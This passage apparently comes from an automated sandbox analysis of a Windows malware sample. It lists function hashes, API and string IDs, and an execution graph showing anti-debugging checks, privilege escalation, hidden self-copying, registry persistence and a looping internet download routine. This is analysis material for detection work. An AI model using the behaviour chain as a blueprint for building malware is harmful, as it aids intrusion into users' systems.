                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D731D87661CAC485D770EB19E4983AEF3A0F798740F40012ADA8D83B68DF3DD554CB25
                                                                                                                                                                                                                        Function 00007FF7E83C3B44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction ID: 450639786c55c5d1d65bff83559ef68e67fbf6a2973d66443f7516afaaa2f4d3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5012536618A808ADB509B14E84471AF7A0F798794F80122AEB8D43F68DF7CC144CF24
                                                                                                                                                                                                                        Function 00007FF7E83C13C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 64073e574a5ca1b4cdb2daaf634adc2f32dc6ccf6073894765d3396a969584ca
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A01EC6290C642C6E730AB51E44432DF7B0FB94348FD8423AD68D42695DF7CD549DB29
                                                                                                                                                                                                                        Function 00007FF7E83C3FC4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: c951c73c061180e0e36ea24f99ea36649c9bfc5bcabe8d5c922ab985825d7f79
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D112E71A0CA9281EB70AB15E48836EF3A0FB94754F84423AC69D42A98DF3DD504DB29
                                                                                                                                                                                                                        Function 00007FF7E83C1088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 23861df8d353d4241067bbf54dba8f92c9ab13a755a245e8db8bb687fda3ae87
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60E01225918A93C2D724BB50F85432DF3A0FBA4744FD4023AD98D42664DF3CD559CB29
                                                                                                                                                                                                                        Function 00007FF7E83C2F2C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4524: CreateFileW.KERNEL32 ref: 00007FF7E83C456B
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C10D8: OpenProcess.KERNEL32 ref: 00007FF7E83C10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF7E83C2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF7E83C2FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction ID: e3fd846cf6b782c40c9acf7693c5eaa9c27c9980c24ace678a063c13880dd1b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E110A3191DA8281E710FB10E8483AEF3A0FBA4705F89013ED54C52B65DF7CE1498B7A

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:41.9%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:479
                                                                                                                                                                                                                        Total number of Limit Nodes:10
                                                                                                                                                                                                                        execution_graph 1459 7ff67e6d2160 1460 7ff67e6d218a InternetOpenW 1459->1460 1461 7ff67e6d21c4 InternetOpenUrlW 1460->1461 1462 7ff67e6d21b7 Sleep 1460->1462 1463 7ff67e6d21fb InternetOpenUrlW 1461->1463 1464 7ff67e6d224d HttpQueryInfoA 1461->1464 1462->1460 1463->1464 1465 7ff67e6d2232 InternetCloseHandle Sleep 1463->1465 1466 7ff67e6d22a2 1464->1466 1467 7ff67e6d227c InternetCloseHandle InternetCloseHandle Sleep 1464->1467 1465->1460 1468 7ff67e6d22ac InternetCloseHandle InternetOpenUrlW 1466->1468 1469 7ff67e6d2309 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1466->1469 1467->1460 1468->1469 1471 7ff67e6d22ee InternetCloseHandle Sleep 1468->1471 1470 7ff67e6d236e InternetCloseHandle InternetCloseHandle 1469->1470 1474 7ff67e6d2388 1469->1474 1472 7ff67e6d2407 1470->1472 1471->1460 1473 7ff67e6d2390 InternetReadFile 1473->1474 1475 7ff67e6d23de InternetCloseHandle InternetCloseHandle 1473->1475 1474->1473 1474->1475 1475->1472 838 7ff67e6d340c 897 7ff67e6d153c 838->897 843 7ff67e6d3424 ExitProcess 844 7ff67e6d342c 1131 7ff67e6d40a4 GetCurrentProcess OpenProcessToken 844->1131 848 7ff67e6d3447 849 7ff67e6d34ab 848->849 850 7ff67e6d345c 848->850 853 7ff67e6d34c0 849->853 854 7ff67e6d34fc 849->854 1146 7ff67e6d41e4 CreateMutexExA 850->1146 856 7ff67e6d41e4 3 API calls 853->856 860 7ff67e6d3552 854->860 861 7ff67e6d3511 854->861 855 7ff67e6d3482 ExitProcess 858 7ff67e6d34cc 856->858 857 7ff67e6d41e4 3 API calls 859 7ff67e6d347b 857->859 862 7ff67e6d34d3 ExitProcess 858->862 863 7ff67e6d34db 858->863 859->855 864 7ff67e6d348a 859->864 1164 7ff67e6d3a34 860->1164 865 7ff67e6d41e4 3 API calls 861->865 1159 7ff67e6d320c 863->1159 1150 7ff67e6d329c 864->1150 870 7ff67e6d351d 865->870 869 7ff67e6d348f 873 7ff67e6d34a3 ExitProcess 869->873 874 7ff67e6d3496 SleepEx 869->874 875 7ff67e6d3524 ExitProcess 870->875 876 7ff67e6d352c 870->876 871 7ff67e6d34e0 877 7ff67e6d34f4 ExitProcess 871->877 878 7ff67e6d34e7 Sleep 871->878 874->869 880 7ff67e6d320c 21 API calls 876->880 878->871 884 7ff67e6d3531 880->884 882 7ff67e6d35be CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 883 7ff67e6d356a 885 7ff67e6d41e4 3 API calls 883->885 886 7ff67e6d3545 ExitProcess 884->886 887 7ff67e6d3538 Sleep 884->887 888 7ff67e6d3576 885->888 887->884 889 7ff67e6d3590 ExitProcess 888->889 890 7ff67e6d41e4 3 API calls 888->890 891 7ff67e6d3589 890->891 891->889 892 7ff67e6d3598 891->892 893 7ff67e6d329c 45 API calls 892->893 894 7ff67e6d359d 893->894 895 7ff67e6d35a4 Sleep 894->895 896 7ff67e6d35b1 ExitProcess 894->896 895->894 1174 7ff67e6d149c LoadLibraryA GetProcAddress 897->1174 899 7ff67e6d15bd 1175 7ff67e6d149c LoadLibraryA GetProcAddress 899->1175 901 7ff67e6d15d7 1176 7ff67e6d14ec LoadLibraryA GetProcAddress 901->1176 903 7ff67e6d15f1 1177 7ff67e6d14ec LoadLibraryA GetProcAddress 903->1177 905 7ff67e6d160b 1178 7ff67e6d14ec LoadLibraryA GetProcAddress 905->1178 907 7ff67e6d1625 1179 7ff67e6d14ec LoadLibraryA GetProcAddress 907->1179 909 7ff67e6d163f 1180 7ff67e6d14ec LoadLibraryA GetProcAddress 909->1180 911 7ff67e6d1659 1181 7ff67e6d14ec LoadLibraryA GetProcAddress 911->1181 913 7ff67e6d1673 1182 7ff67e6d14ec LoadLibraryA GetProcAddress 913->1182 915 7ff67e6d168d 1183 7ff67e6d14ec LoadLibraryA GetProcAddress 915->1183 917 7ff67e6d16a7 1184 7ff67e6d14ec LoadLibraryA GetProcAddress 917->1184 919 7ff67e6d16c1 1185 7ff67e6d149c LoadLibraryA GetProcAddress 919->1185 921 7ff67e6d16db 1186 7ff67e6d149c LoadLibraryA GetProcAddress 921->1186 923 7ff67e6d16f5 1187 7ff67e6d149c LoadLibraryA GetProcAddress 923->1187 925 7ff67e6d170f 1188 7ff67e6d149c LoadLibraryA GetProcAddress 925->1188 927 7ff67e6d1729 1189 7ff67e6d14ec LoadLibraryA GetProcAddress 927->1189 929 7ff67e6d1743 1190 7ff67e6d14ec LoadLibraryA GetProcAddress 929->1190 931 7ff67e6d175d 1191 7ff67e6d14ec LoadLibraryA GetProcAddress 931->1191 933 7ff67e6d1777 1192 7ff67e6d14ec LoadLibraryA GetProcAddress 933->1192 935 7ff67e6d1791 1193 7ff67e6d14ec LoadLibraryA GetProcAddress 935->1193 937 7ff67e6d17ab 1194 7ff67e6d14ec LoadLibraryA GetProcAddress 937->1194 939 7ff67e6d17c5 1195 7ff67e6d14ec LoadLibraryA GetProcAddress 939->1195 941 7ff67e6d17df 1196 7ff67e6d14ec LoadLibraryA GetProcAddress 941->1196 943 7ff67e6d17f9 1197 7ff67e6d14ec LoadLibraryA GetProcAddress 943->1197 945 7ff67e6d1813 1198 7ff67e6d14ec LoadLibraryA GetProcAddress 945->1198 947 7ff67e6d182d 1199 7ff67e6d14ec LoadLibraryA GetProcAddress 947->1199 949 7ff67e6d1847 1200 7ff67e6d14ec LoadLibraryA GetProcAddress 949->1200 951 7ff67e6d1861 1201 7ff67e6d14ec LoadLibraryA GetProcAddress 951->1201 953 7ff67e6d187b 1202 7ff67e6d14ec LoadLibraryA GetProcAddress 953->1202 955 7ff67e6d1895 1203 7ff67e6d14ec LoadLibraryA GetProcAddress 955->1203 957 7ff67e6d18af 1204 7ff67e6d14ec LoadLibraryA GetProcAddress 957->1204 959 7ff67e6d18c9 1205 7ff67e6d14ec LoadLibraryA GetProcAddress 959->1205 961 7ff67e6d18e3 1206 7ff67e6d14ec LoadLibraryA GetProcAddress 961->1206 963 7ff67e6d18fd 1207 7ff67e6d14ec LoadLibraryA GetProcAddress 963->1207 965 7ff67e6d1917 1208 7ff67e6d14ec LoadLibraryA GetProcAddress 965->1208 967 7ff67e6d1931 1209 7ff67e6d14ec LoadLibraryA GetProcAddress 967->1209 969 7ff67e6d194b 1210 7ff67e6d14ec LoadLibraryA GetProcAddress 969->1210 971 7ff67e6d1965 1211 7ff67e6d14ec LoadLibraryA GetProcAddress 971->1211 973 7ff67e6d197f 1212 7ff67e6d14ec LoadLibraryA GetProcAddress 973->1212 975 7ff67e6d1999 1213 7ff67e6d14ec LoadLibraryA GetProcAddress 975->1213 977 7ff67e6d19b3 1214 7ff67e6d14ec LoadLibraryA GetProcAddress 977->1214 979 7ff67e6d19cd 1215 7ff67e6d14ec LoadLibraryA GetProcAddress 979->1215 981 7ff67e6d19e7 1216 7ff67e6d14ec LoadLibraryA GetProcAddress 981->1216 983 7ff67e6d1a01 1217 7ff67e6d14ec LoadLibraryA GetProcAddress 983->1217 985 7ff67e6d1a1b 1218 7ff67e6d14ec LoadLibraryA GetProcAddress 985->1218 987 7ff67e6d1a35 1219 7ff67e6d14ec LoadLibraryA GetProcAddress 987->1219 989 7ff67e6d1a4f 1220 7ff67e6d14ec LoadLibraryA GetProcAddress 989->1220 991 7ff67e6d1a69 1221 7ff67e6d14ec LoadLibraryA GetProcAddress 991->1221 993 7ff67e6d1a83 1222 7ff67e6d14ec LoadLibraryA GetProcAddress 993->1222 995 7ff67e6d1a9d 1223 7ff67e6d14ec LoadLibraryA GetProcAddress 995->1223 997 7ff67e6d1ab7 1224 7ff67e6d14ec LoadLibraryA GetProcAddress 997->1224 999 7ff67e6d1ad1 1225 7ff67e6d14ec LoadLibraryA GetProcAddress 999->1225 1001 7ff67e6d1aeb 1226 7ff67e6d14ec LoadLibraryA GetProcAddress 1001->1226 1003 7ff67e6d1b05 1227 7ff67e6d14ec LoadLibraryA GetProcAddress 1003->1227 1005 7ff67e6d1b1f 1228 7ff67e6d14ec LoadLibraryA GetProcAddress 1005->1228 1007 7ff67e6d1b39 1229 7ff67e6d14ec LoadLibraryA GetProcAddress 1007->1229 1009 7ff67e6d1b53 1230 7ff67e6d14ec LoadLibraryA GetProcAddress 1009->1230 1011 7ff67e6d1b6d 1231 7ff67e6d14ec LoadLibraryA GetProcAddress 1011->1231 1013 7ff67e6d1b87 1232 7ff67e6d14ec LoadLibraryA GetProcAddress 1013->1232 1015 7ff67e6d1ba1 1233 7ff67e6d14ec LoadLibraryA GetProcAddress 1015->1233 1017 7ff67e6d1bbb 1234 7ff67e6d14ec LoadLibraryA GetProcAddress 1017->1234 1019 7ff67e6d1bd5 1235 7ff67e6d14ec LoadLibraryA GetProcAddress 1019->1235 1021 7ff67e6d1bef 1236 7ff67e6d14ec LoadLibraryA GetProcAddress 1021->1236 1023 7ff67e6d1c09 1237 7ff67e6d14ec LoadLibraryA GetProcAddress 1023->1237 1025 7ff67e6d1c23 1238 7ff67e6d14ec LoadLibraryA GetProcAddress 1025->1238 1027 7ff67e6d1c3d 1239 7ff67e6d14ec LoadLibraryA GetProcAddress 1027->1239 1029 7ff67e6d1c57 1240 7ff67e6d14ec LoadLibraryA GetProcAddress 1029->1240 1031 7ff67e6d1c71 1241 7ff67e6d14ec LoadLibraryA GetProcAddress 1031->1241 1033 7ff67e6d1c8b 1242 7ff67e6d14ec LoadLibraryA GetProcAddress 1033->1242 1035 7ff67e6d1ca5 1243 7ff67e6d14ec LoadLibraryA GetProcAddress 1035->1243 1037 7ff67e6d1cbf 1244 7ff67e6d14ec LoadLibraryA GetProcAddress 1037->1244 1039 7ff67e6d1cd9 1245 7ff67e6d14ec LoadLibraryA GetProcAddress 1039->1245 1041 7ff67e6d1cf3 1246 7ff67e6d14ec LoadLibraryA GetProcAddress 1041->1246 1043 7ff67e6d1d0d 1247 7ff67e6d14ec LoadLibraryA GetProcAddress 1043->1247 1045 7ff67e6d1d27 1248 7ff67e6d14ec LoadLibraryA GetProcAddress 1045->1248 1047 7ff67e6d1d41 1249 7ff67e6d14ec LoadLibraryA GetProcAddress 1047->1249 1049 7ff67e6d1d5b 1250 7ff67e6d14ec LoadLibraryA GetProcAddress 1049->1250 1051 7ff67e6d1d75 1251 7ff67e6d14ec LoadLibraryA GetProcAddress 1051->1251 1053 7ff67e6d1d8f 1252 7ff67e6d14ec LoadLibraryA GetProcAddress 1053->1252 1055 7ff67e6d1da9 1253 7ff67e6d14ec LoadLibraryA GetProcAddress 1055->1253 1057 7ff67e6d1dc3 1254 7ff67e6d14ec LoadLibraryA GetProcAddress 1057->1254 1059 7ff67e6d1ddd 1255 7ff67e6d14ec LoadLibraryA GetProcAddress 1059->1255 1061 7ff67e6d1df7 1256 7ff67e6d14ec LoadLibraryA GetProcAddress 1061->1256 1063 7ff67e6d1e11 1257 7ff67e6d14ec LoadLibraryA GetProcAddress 1063->1257 1065 7ff67e6d1e2b 1258 7ff67e6d14ec LoadLibraryA GetProcAddress 1065->1258 1067 7ff67e6d1e45 1259 7ff67e6d14ec LoadLibraryA GetProcAddress 1067->1259 1069 7ff67e6d1e5f 1260 7ff67e6d14ec LoadLibraryA GetProcAddress 1069->1260 1071 7ff67e6d1e79 1261 7ff67e6d14ec LoadLibraryA GetProcAddress 1071->1261 1073 7ff67e6d1e93 1262 7ff67e6d14ec LoadLibraryA GetProcAddress 1073->1262 1075 7ff67e6d1ead 1263 7ff67e6d14ec LoadLibraryA GetProcAddress 1075->1263 1077 7ff67e6d1ec7 1264 7ff67e6d14ec LoadLibraryA GetProcAddress 1077->1264 1079 7ff67e6d1ee1 1265 7ff67e6d14ec LoadLibraryA GetProcAddress 1079->1265 1081 7ff67e6d1efb 1266 7ff67e6d14ec LoadLibraryA GetProcAddress 1081->1266 1083 7ff67e6d1f15 1267 7ff67e6d14ec LoadLibraryA GetProcAddress 1083->1267 1085 7ff67e6d1f2f 1268 7ff67e6d14ec LoadLibraryA GetProcAddress 1085->1268 1087 7ff67e6d1f49 1269 7ff67e6d14ec LoadLibraryA GetProcAddress 1087->1269 1089 7ff67e6d1f63 1270 7ff67e6d14ec LoadLibraryA GetProcAddress 1089->1270 1091 7ff67e6d1f7d 1271 7ff67e6d14ec LoadLibraryA GetProcAddress 1091->1271 1093 7ff67e6d1f97 1272 7ff67e6d14ec LoadLibraryA GetProcAddress 1093->1272 1095 7ff67e6d1fb1 1273 7ff67e6d149c LoadLibraryA GetProcAddress 1095->1273 1097 7ff67e6d1fcb 1274 7ff67e6d14ec LoadLibraryA GetProcAddress 1097->1274 1099 7ff67e6d1fe5 1275 7ff67e6d14ec LoadLibraryA GetProcAddress 1099->1275 1101 7ff67e6d1fff 1276 7ff67e6d14ec LoadLibraryA GetProcAddress 1101->1276 1103 7ff67e6d2019 1277 7ff67e6d14ec LoadLibraryA GetProcAddress 1103->1277 1105 7ff67e6d2033 1278 7ff67e6d14ec LoadLibraryA GetProcAddress 1105->1278 1107 7ff67e6d204d 1279 7ff67e6d14ec LoadLibraryA GetProcAddress 1107->1279 1109 7ff67e6d2067 1280 7ff67e6d14ec LoadLibraryA GetProcAddress 1109->1280 1111 7ff67e6d2081 1281 7ff67e6d149c LoadLibraryA GetProcAddress 1111->1281 1113 7ff67e6d209b 1282 7ff67e6d149c LoadLibraryA GetProcAddress 1113->1282 1115 7ff67e6d20b5 1283 7ff67e6d14ec LoadLibraryA GetProcAddress 1115->1283 1117 7ff67e6d20cf 1284 7ff67e6d14ec LoadLibraryA GetProcAddress 1117->1284 1119 7ff67e6d20e9 1285 7ff67e6d14ec LoadLibraryA GetProcAddress 1119->1285 1121 7ff67e6d2103 1286 7ff67e6d14ec LoadLibraryA GetProcAddress 1121->1286 1123 7ff67e6d211d 1287 7ff67e6d14ec LoadLibraryA GetProcAddress 1123->1287 1125 7ff67e6d2137 1288 7ff67e6d14ec LoadLibraryA GetProcAddress 1125->1288 1127 7ff67e6d2151 1128 7ff67e6d31ac IsDebuggerPresent 1127->1128 1129 7ff67e6d31be GetCurrentProcess CheckRemoteDebuggerPresent 1128->1129 1130 7ff67e6d31ba 1128->1130 1129->1130 1130->843 1130->844 1132 7ff67e6d3431 1131->1132 1133 7ff67e6d40ca GetTokenInformation 1131->1133 1142 7ff67e6d3ca4 GetModuleFileNameW 1132->1142 1289 7ff67e6d3b14 VirtualAlloc 1133->1289 1135 7ff67e6d40fb GetTokenInformation 1136 7ff67e6d4142 AdjustTokenPrivileges CloseHandle 1135->1136 1137 7ff67e6d4128 CloseHandle 1135->1137 1290 7ff67e6d3ae4 1136->1290 1138 7ff67e6d3ae4 VirtualFree 1137->1138 1139 7ff67e6d413d 1138->1139 1139->1132 1143 7ff67e6d3d92 wcsncpy 1142->1143 1144 7ff67e6d3ccf PathFindFileNameW wcslen 1142->1144 1145 7ff67e6d3d09 1143->1145 1144->1145 1145->848 1147 7ff67e6d4210 GetLastError 1146->1147 1148 7ff67e6d3468 1146->1148 1147->1148 1149 7ff67e6d421d CloseHandle 1147->1149 1148->855 1148->857 1149->1148 1293 7ff67e6d3884 1150->1293 1152 7ff67e6d32ad 1296 7ff67e6d4524 CreateFileW 1152->1296 1154 7ff67e6d32c5 1155 7ff67e6d3307 CreateThread 1154->1155 1308 7ff67e6d4084 1154->1308 1155->869 1160 7ff67e6d3884 11 API calls 1159->1160 1161 7ff67e6d321c 1160->1161 1344 7ff67e6d42f4 CreateFileW 1161->1344 1165 7ff67e6d3704 3 API calls 1164->1165 1166 7ff67e6d3a5f 1165->1166 1167 7ff67e6d3884 11 API calls 1166->1167 1168 7ff67e6d3a69 GetModuleFileNameW DeleteFileW CopyFileW 1167->1168 1169 7ff67e6d3aab SetFileAttributesW 1168->1169 1170 7ff67e6d3557 1168->1170 1356 7ff67e6d3974 RegOpenKeyExW 1169->1356 1172 7ff67e6d339c GetVersionExW 1170->1172 1173 7ff67e6d33cd 1172->1173 1173->882 1173->883 1174->899 1175->901 1176->903 1177->905 1178->907 1179->909 1180->911 1181->913 1182->915 1183->917 1184->919 1185->921 1186->923 1187->925 1188->927 1189->929 1190->931 1191->933 1192->935 1193->937 1194->939 1195->941 1196->943 1197->945 1198->947 1199->949 1200->951 1201->953 1202->955 1203->957 1204->959 1205->961 1206->963 1207->965 1208->967 1209->969 1210->971 1211->973 1212->975 1213->977 1214->979 1215->981 1216->983 